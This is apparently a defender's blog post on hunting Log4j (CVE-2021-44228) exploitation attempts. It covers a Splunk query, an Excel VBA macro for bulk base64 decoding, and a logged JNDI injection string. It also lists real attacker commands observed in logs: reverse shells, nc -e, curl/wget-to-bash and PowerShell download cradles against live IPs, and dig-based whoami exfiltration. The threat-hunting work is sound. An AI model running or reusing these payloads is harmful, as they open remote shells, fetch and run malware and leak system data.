As you are aware, there are new Log4j vuln (CVE-2021-44228) vuln been disclosed and exploited in the wild currently.

So, I’m using Splunk query as below; based from Splunk blog [1] to see if there is attempt to use this vuln/exploit towards our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype 

As you can see, there are numbers of attempt observed towards our infra for past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=} https://X.X.X.X/owa/ 200 0 0 0

Using the Splunk query above, it will show you a table formatted data which contains extracted base64 under field named “string“.

The result after we export it from Splunk (opened in Excel) looks like:

If you decode the base64 from the example of raw event above:

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=

It appear to be a curl & wget attempt towards our infra:

(curl -s 45.155.205.233:5874/X.X.X.X:443||wget -q -O- 45.155.205.233:5874/X.X.X.X:443)|bash

I’m wondering.. How can I quickly decode all these base64 strings? We not gonna decode it one-by-one aren’t we? There are hundreds or probably thousand of it.

So… We going to leverage Excel & macro (yes. you read it right. MACRO) to automatically decode those base64 strings for us. We going to Excel-Fu out of this data.

The macro code that we’ll be using as below:

Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Open
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
        .Close
    End With

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Open
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
        .Close
    End With

End Function

To use it, first, we need to open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the macro editor. Create new macro – you can give any name you want. For example, I named it “Base64“:

It will then open a new window. Paste macro code given above inside the editor:

After that, close the editor window. Just leave the Excel open.

Then, create 2 new column in the Excel sheet; column named “ASCII” and “Decoded Base64“:

We need to fill up column “ASCII” with string “ASCII” until end/bottom of your data. Let’s say you have 300 row of data in your Excel, then fill 300 of “ASCII” strings besides it.

Just press Ctrl + Arrow-Down to quickly go to end/bottom of data column. After that, type in string “ASCII” in one of the row and copy it (Ctrl-C). Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. Then paste/Ctrl + V to fill all column with string “ASCII“.

Your Excel will look something like this:

Next, we going to start decoding the base64 strings.

Again, press Ctrl + Arrow-Down to go end of column, and type the formula as below:

=TextBase64Decode(<column-string>,<column-ASCII>)

Refer example as below:

Then, again, copy column with the formula, Ctrl + Shift + Arrow-Up to select from bottom to top & paste/Ctrl + V the formula into all selected column; under “Decoded Base64“.

That’s it. We have successfully decoded all the base64 strings via Excel.

List of attempt that I’ve observed so far:

(curl http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php || wget -q -O- http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php)|bash
(curl -S https://www.econ-jobs.com/Scripts/op.php||wget https://www.econ-jobs.com/Scripts/op.php)|bash
/bin/bash -i >& /dev/tcp/141.105.65.94/81
bash -i  >& /dev/tcp/139.59.138.109/8080 0>&1
bash -i >& /dev/tcp/141.105.65.94/443 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php
dig $(whoami).c6sp7vq2vtc0000xa9y0gdc5d7hyyyyyb.interactsh.com
dig $(whoami).wjj96oqhn65ebgyqdrh6lt7o6fc80x.burpcollaborator.net
nc 165.22.213.147 8888 -e /bin/bash ; curl http://165.22.213.147:7777/backdoor.sh -o backdoor.sh ; chmod +x ./backdoor.sh ;bash backdoor.sh ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin.net/raw/0l8h4xuvxe'))
telnet 141.105.65.94 443
touch /tmp/pwned
wget http://155.94.154.170/aaa;curl -O http://155.94.154.170/aaa;chmod 777 aaa;./aaa
wget http://194.36.188.187:9090/log/14953

References:
[1] https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
[2] https://stackoverflow.com/questions/41572920/encoding-special-chracters-to-base64-in-excel-vba

By zam

One thought on “Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel”

Any Comments?

This site uses Akismet to reduce spam. Learn how your comment data is processed.